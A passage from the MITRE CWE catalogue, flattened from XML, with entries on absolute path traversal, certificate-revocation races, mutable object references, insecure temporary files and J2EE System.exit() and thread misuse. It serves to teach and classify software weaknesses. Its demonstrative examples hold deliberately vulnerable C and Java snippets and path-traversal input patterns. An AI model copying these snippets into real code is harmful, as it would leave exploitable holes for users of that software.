https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2147 - - - CVE-2000-0614 - Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0614 - - - - - /absolute/pathname/here - - - FIO05-C - Identify files using multiple file attributes - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Path Issue - Slash Absolute Path - /absolute/pathname/here - - - - The software does not check the revocation status of a certificate after its initial revocation check, which can cause the software to perform privileged actions even after the certificate is revoked at a later time. - If the revocation status of a certificate is not checked before each action that requires privileges, the system may be subject to a race condition. If a certificate is revoked after the initial check, all subsequent actions taken with the owner of the revoked certificate will lose all benefits guaranteed by the certificate. In fact, it is almost certain that the use of a revoked certificate indicates malicious activity. - - - - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Medium - - - Access Control - Gain Privileges or Assume Identity - Trust may be assigned to an entity who is not who it claims to be. - - - Integrity - Modify Application Data - Data from an untrusted (and possibly malicious) source may be integrated. - - - Confidentiality - Read Application Data - Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure. - - - - - Architecture and Design - Ensure that certificates are checked for revoked status before each use of a protected resource. If the certificate is checked before each access of a protected resource, the delay subject to a possible race condition becomes almost negligible and significantly reduces the risk associated with this issue. - - - - - The following code checks a certificate before performing an action. - - if (cert = SSL_get_peer_certificate(ssl)) { - foo=SSL_get_verify_result(ssl);if (X509_V_OK==foo) - - - //do stuff - foo=SSL_get_verify_result(ssl); - //do more stuff without the check. - - - - - - - - While the code performs the certificate verification before each action, it does not check the result of the verification after the initial attempt. The certificate may have been revoked in the time between the privileged actions. - - - - - Race condition in checking for certificate revocation - - - SFP20 - Race Condition Window - - - - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Name, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Race Condition in Checking for Certificate Revocation - - - - The software does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Varies by Context - Unexpected State - - - - - Incomplete Internal State Distinction - - - - - - - - This conceptually overlaps other categories such as insufficient verification, but this entry refers to the product's incorrect perception of its own state. - This is probably resultant from other weaknesses such as unhandled error conditions, inability to handle out-of-order steps, multiple interpretation errors, etc. - This entry is being considered for deprecation. It was poorly-defined in PLOVER and is not easily described using the behavior/resource/property model of vulnerability theory. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2018-03-27 - updated Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - - - This entry was deprecated because it overlapped the same concepts as race condition (CWE-362) and Improper Synchronization (CWE-662). - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-12 - Critical - Deprecated entry - - - CWE Content Team - MITRE - 2010-12-13 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - State Synchronization Error - - - - The program sends non-cloned mutable data as an argument to a method or function. - The function or method that has been called can alter or delete the mutable data. This could violate assumptions that the calling function has made about its state. In situations where unknown code is called with references to mutable data, this external code could make changes to the data sent. If this data was not previously cloned, the modified data might not be valid in the context of execution. - - - - - - - - - - - - Implementation - - - Medium - - - Integrity - Modify Memory - Potentially data could be tampered with by another function which should not have been tampered with. - - - - - Implementation - Pass in data which should not be altered as constant or immutable. - - - Implementation - Clone all mutable data before passing it into an external function . This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class. - - - - - The following example demonstrates the weakness. - - private:int foo;complexType bar;String baz;otherClass externalClass; - - public:void doStuff() {externalClass.doOtherStuff(foo, bar, baz)} - - - In this example, bar and baz will be passed by reference to doOtherStuff() which may change them. - - - In the following Java example, the BookStore class manages the sale of books in a bookstore, this class includes the member objects for the bookstore inventory and sales database manager classes. The BookStore class includes a method for updating the sales database and inventory when a book is sold. This method retrieves a Book object from the bookstore inventory object using the supplied ISBN number for the book class, then calls a method for the sales object to update the sales information and then calls a method for the inventory object to update inventory for the BookStore. - - public class BookStore { - private BookStoreInventory inventory;private SalesDBManager sales;... - // constructor for BookStore - public BookStore() {this.inventory = new BookStoreInventory();this.sales = new SalesDBManager();...}public void updateSalesAndInventoryForBookSold(String bookISBN) { - - - // Get book object from inventory using ISBN - Book book = inventory.getBookWithISBN(bookISBN); - // update sales information for book sold - sales.updateSalesInformation(book); - // update inventory - inventory.updateInventory(book); - } - // other BookStore methods - ... - }public class Book {private String title;private String author;private String isbn; - // Book object constructors and get/set methods - ...} - - However, in this example the Book object that is retrieved and passed to the method of the sales object could have its contents modified by the method. This could cause unexpected results when the book object is sent to the method for the inventory object to update the inventory. - In the Java programming language arguments to methods are passed by value, however in the case of objects a reference to the object is passed by value to the method. When an object reference is passed as a method argument a copy of the object reference is made within the method and therefore both references point to the same object. This allows the contents of the object to be modified by the method that holds the copy of the object reference. [REF-374] - In this case the contents of the Book object could be modified by the method of the sales object prior to the call to update the inventory. - To prevent the contents of the Book object from being modified, a copy of the Book object should be made before the method call to the sales object. In the following example a copy of the Book object is made using the clone() method and the copy of the Book object is passed to the method of the sales object. This will prevent any changes being made to the original Book object. - - ...public void updateSalesAndInventoryForBookSold(String bookISBN) { - - - // Get book object from inventory using ISBN - Book book = inventory.getBookWithISBN(bookISBN); - // Create copy of book object to make sure contents are not changed - Book bookSold = (Book) book.clone(); - // update sales information for book sold - sales.updateSalesInformation(bookSold); - // update inventory - inventory.updateInventory(book); - }... - - - - - - Passing mutable objects to an untrusted method - - - OBJ04-J - Provide mutable classes with copy functionality to safely allow passing instances to untrusted code - - - SFP23 - Exposed Data - - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Name, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Mutable Objects Passed by Reference - - - - Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function. - In situations where functions return references to mutable data, it is possible that the external code which called the function may make changes to the data sent. If this data was not previously cloned, the class will then be using modified data which may violate assumptions about its internal state. - - - - - - - - - - - - Implementation - - - Medium - - - Access Control - Integrity - Modify Memory - Potentially data could be tampered with by another function which should not have been tampered with. - - - - - Implementation - Declare returned data which should not be altered as constant or immutable. - - - Implementation - Clone all mutable data before returning references to it. This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class. - - - - - This class has a private list of patients, but provides a way to see the list : - - public class ClinicalTrial {private PatientClass[] patientList = new PatientClass[50];public getPatients(...){return patientList;}} - - While this code only means to allow reading of the patient list, the getPatients() method returns a reference to the class's original patient list instead of a reference to a copy of the list. Any caller of this method can arbitrarily modify the contents of the patient list even though it is a private member of the class. - - - - - Mutable object returned - - - OBJ04-J - Provide mutable classes with copy functionality to safely allow passing instances to untrusted code - - - OBJ05-J - Defensively copy private mutable class members before returning their references - - - EXP34-PL - Do not modify $_ in list or sorting functions - Imprecise - - - SFP23 - Exposed Data - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-09-27 - updated Name, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Passing Mutable Objects to an Untrusted Method - - - - Creating and using insecure temporary files can leave application and system data vulnerable to attack. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - The following code uses a temporary file for storing intermediate data gathered from the network before it is processed. - - if (tmpnam_r(filename)) { - - FILE* tmp = fopen(filename,"wb+");while((recv(sock,recvbuf,DATA_SIZE, 0) > 0)&(amt!=0)) amt = fwrite(recvbuf,1,DATA_SIZE,tmp); - }... - - This otherwise unremarkable code is vulnerable to a number of different attacks because it relies on an insecure method for creating temporary files. The vulnerabilities introduced by this function and others are described in the following sections. The most egregious security problems related to temporary file creation have occurred on Unix-based operating systems, but Windows applications have parallel risks. This section includes a discussion of temporary file creation on both Unix and Windows systems. Methods and behaviors can vary between systems, but the fundamental risks introduced by each are reasonably constant. - - - - - Insecure Temporary File - - - CON33-C - Avoid race conditions when using library functions - Imprecise - - - FIO00-J - Do not operate on files in shared directories - - - - - - - - - - - - - - Applications require temporary files so frequently that many different mechanisms exist for creating them in the C Library and Windows(R) API. Most of these functions are vulnerable to various forms of attacks. - The functions designed to aid in the creation of temporary files can be broken into two groups based whether they simply provide a filename or actually open a new file. - Group 1: "Unique" Filenames: The first group of C Library and WinAPI functions designed to help with the process of creating temporary files do so by generating a unique file name for a new temporary file, which the program is then supposed to open. This group includes C Library functions like tmpnam(), tempnam(), mktemp() and their C++ equivalents prefaced with an _ (underscore) as well as the GetTempFileName() function from the Windows API. This group of functions suffers from an underlying race condition on the filename chosen. Although the functions guarantee that the filename is unique at the time it is selected, there is no mechanism to prevent another process or an attacker from creating a file with the same name after it is selected but before the application attempts to open the file. Beyond the risk of a legitimate collision caused by another call to the same function, there is a high probability that an attacker will be able to create a malicious collision because the filenames generated by these functions are not sufficiently randomized to make them difficult to guess. If a file with the selected name is created, then depending on how the file is opened the existing contents or access permissions of the file may remain intact. If the existing contents of the file are malicious in nature, an attacker may be able to inject dangerous data into the application when it reads data back from the temporary file. If an attacker pre-creates the file with relaxed access permissions, then data stored in the temporary file by the application may be accessed, modified or corrupted by an attacker. On Unix based systems an even more insidious attack is possible if the attacker pre-creates the file as a link to another important file. Then, if the application truncates or writes data to the file, it may unwittingly perform damaging operations for the attacker. This is an especially serious threat if the program operates with elevated permissions. Finally, in the best case the file will be opened with the a call to open() using the O_CREAT and O_EXCL flags or to CreateFile() using the CREATE_NEW attribute, which will fail if the file already exists and therefore prevent the types of attacks described above. However, if an attacker is able to accurately predict a sequence of temporary file names, then the application may be prevented from opening necessary temporary storage causing a denial of service (DoS) attack. This type of attack would not be difficult to mount given the small amount of randomness used in the selection of the filenames generated by these functions. - Group 2: "Unique" Files: The second group of C Library functions attempts to resolve some of the security problems related to temporary files by not only generating a unique file name, but also opening the file. This group includes C Library functions like tmpfile() and its C++ equivalents prefaced with an _ (underscore), as well as the slightly better-behaved C Library function mkstemp(). The tmpfile() style functions construct a unique filename and open it in the same way that fopen() would if passed the flags "wb+", that is, as a binary file in read/write mode. If the file already exists, tmpfile() will truncate it to size zero, possibly in an attempt to assuage the security concerns mentioned earlier regarding the race condition that exists between the selection of a supposedly unique filename and the subsequent opening of the selected file. However, this behavior clearly does not solve the function's security problems. First, an attacker can pre-create the file with relaxed access-permissions that will likely be retained by the file opened by tmpfile(). Furthermore, on Unix based systems if the attacker pre-creates the file as a link to another important file, the application may use its possibly elevated permissions to truncate that file, thereby doing damage on behalf of the attacker. Finally, if tmpfile() does create a new file, the access permissions applied to that file will vary from one operating system to another, which can leave application data vulnerable even if an attacker is unable to predict the filename to be used in advance. Finally, mkstemp() is a reasonably safe way create temporary files. It will attempt to create and open a unique file based on a filename template provided by the user combined with a series of randomly generated characters. If it is unable to create such a file, it will fail and return -1. On modern systems the file is opened using mode 0600, which means the file will be secure from tampering unless the user explicitly changes its access permissions. However, mkstemp() still suffers from the use of predictable file names and can leave an application vulnerable to denial of service attacks if an attacker causes mkstemp() to fail by predicting and pre-creating the filenames to be used. - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - - - Opening temporary files without appropriate measures or controls can leave the file, its contents and any function that it impacts vulnerable to attack. - - - - - - - - - Architecture and Design - - - Implementation - - - High - - - Confidentiality - Read Application Data - If the temporary file can be read by the attacker, sensitive information may be in that file which could be revealed. - - - Authorization - Other - Other - If that file can be written to by the attacker, the file might be moved into a place to which the attacker does not have access. This will allow the attacker to gain selective resource access-control privileges. - - - Integrity - Other - Other - Depending on the data stored in the temporary file, there is the potential for an attacker to gain an additional input vector which is trusted as non-malicious. It may be possible to make arbitrary changes to data structures, user information, or even process ownership. - - - - - Requirements - Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible. - - - Implementation - Ensure that you use proper file permissions. This can be achieved by using a safe temp file function. Temporary files should be writable and readable only by the process that owns the file. - - - Implementation - Randomize temporary file names. This can also be achieved by using a safe temp-file function. This will ensure that temporary files will not be created in predictable places. - - - - - In the following code examples a temporary file is created and written to. After using the temporary file, the file is closed and deleted from the file system. - - FILE *stream;if( (stream = tmpfile()) == NULL ) { - - perror("Could not open new temporary file\n");return (-1); - } - // write data to tmp file - ...// remove tmp filermtmp(); - - However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file. - - try {File temp = File.createTempFile("pattern", ".suffix");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write("aString");out.close();}catch (IOException e) {} - - Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users. - Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually "/tmp" or "/var/tmp" and on Windows systems the default directory is usually "C:\\Windows\\Temp", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file. - - - - - Improper temp file opening - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Improper Temporary File Opening - - - - The software creates a temporary file in a directory whose permissions allow unintended actors to determine the file's existence or otherwise access that file. - On some operating systems, the fact that the temporary file exists may be apparent to any user with sufficient privileges to access that directory. Since the file is visible, the application that is using the temporary file could be known. If one has access to list the processes on the system, the attacker has gained information about what the user is doing at that time. By correlating this with the applications the user is running, an attacker could potentially discover what a user's actions are. From this, higher levels of security could be breached. - - - - - - - - - Architecture and Design - - - Implementation - - - Low - - - Confidentiality - Read Application Data - Since the file is visible and the application which is using the temp file could be known, the attacker has gained information about what the user is doing at that time. - - - - - Requirements - Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible. - - - Implementation - Try to store sensitive tempfiles in a directory which is not world readable -- i.e., per-user directories. - - - Implementation - Avoid using vulnerable temp file functions. - - - - - In the following code examples a temporary file is created and written to. After using the temporary file, the file is closed and deleted from the file system. - - FILE *stream;if( (stream = tmpfile()) == NULL ) { - - perror("Could not open new temporary file\n");return (-1); - } - // write data to tmp file - ...// remove tmp filermtmp(); - - However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file. - - try {File temp = File.createTempFile("pattern", ".suffix");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write("aString");out.close();}catch (IOException e) {} - - Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users. - Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually "/tmp" or "/var/tmp" and on Windows systems the default directory is usually "C:\\Windows\\Temp", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file. - - - - - Guessed or visible temporary file - - - FIO15-C - Ensure that file operations are performed in a secure directory - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, References, Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Guessed or Visible Temporary File - Creation of Temporary File in Directory with Insecure Permissions - Creation of Temporary File in Directory with Incorrect Permissions - - - - A software system that accepts input in the form of a backslash absolute path ('\absolute\pathname\here') without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-1999-1263 - Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1263 - - - CVE-2003-0753 - Remote attackers can read arbitrary files via a full pathname to the target file in config parameter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0753 - - - CVE-2002-1525 - Remote attackers can read arbitrary files via an absolute pathname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1525 - - - - - \absolute\pathname\here ('backslash absolute path') - - - FIO05-C - Identify files using multiple file attributes - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Path Issue - Backslash Absolute Path - \absolute\pathname\here - - - - A J2EE application uses System.exit(), which also shuts down its container. - It is never a good idea for a web application to attempt to shut down the application container. Access to a function that can shut down the application is an avenue for Denial of Service (DoS) attacks. - - - - - - - - - Implementation - A call to System.exit() is probably part of leftover debug code or code imported from a non-J2EE application. - - - - - Availability - DoS: Crash, Exit, or Restart - - - - - Architecture and Design - Separation of Privilege - The shutdown function should be a privileged function available only to a properly authorized administrative user - - - Implementation - Web applications should not call methods that cause the virtual machine to exit, such as System.exit() - - - Implementation - Web applications should also not throw any Throwables to the application server as this may adversely affect the container. - - - Implementation - Non-web applications may have a main() method that contains a System.exit(), but generally should not call System.exit() from other locations in the code - - - - - Included in the doPost() method defined below is a call to System.exit() in the event of a specific exception. - - Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {try {...} catch (ApplicationSpecificException ase) {logger.error("Caught: " + ase.toString());System.exit(1);}} - - - - - - J2EE Bad Practices: System.exit() - - - A9 - Denial of Service - CWE More Specific - - - ERR09-J - Do not allow untrusted code to terminate the JVM - - - SFP3 - Use of an improper API - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - J2EE Bad Practices: System.exit() - - - - Thread management in a Web application is forbidden in some circumstances and is always highly error prone. - Thread management in a web application is forbidden by the J2EE standard in some circumstances and is always highly error prone. Managing threads is difficult and is likely to interfere in unpredictable ways with the behavior of the application container. Even without interfering with the container, thread management usually leads to bugs that are hard to detect and diagnose like deadlock, race conditions, and other synchronization errors. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - - - - - Architecture and Design - For EJB, use framework approaches for parallel execution, instead of using threads. - - - - - In the following example, a new Thread object is created and invoked directly from within the body of a doGet() method in a Java servlet. - - public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { - - - // Perform servlet tasks. - ... - - // Create a new thread to handle background processing. - Runnable r = new Runnable() { - public void run() { - - - // Process and store request statistics. - ... - } - }; - new Thread(r).start(); - } - - - - - System Process - - - - J2EE Bad Practices: Threads - - - SFP3 - Use of an improper API - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - 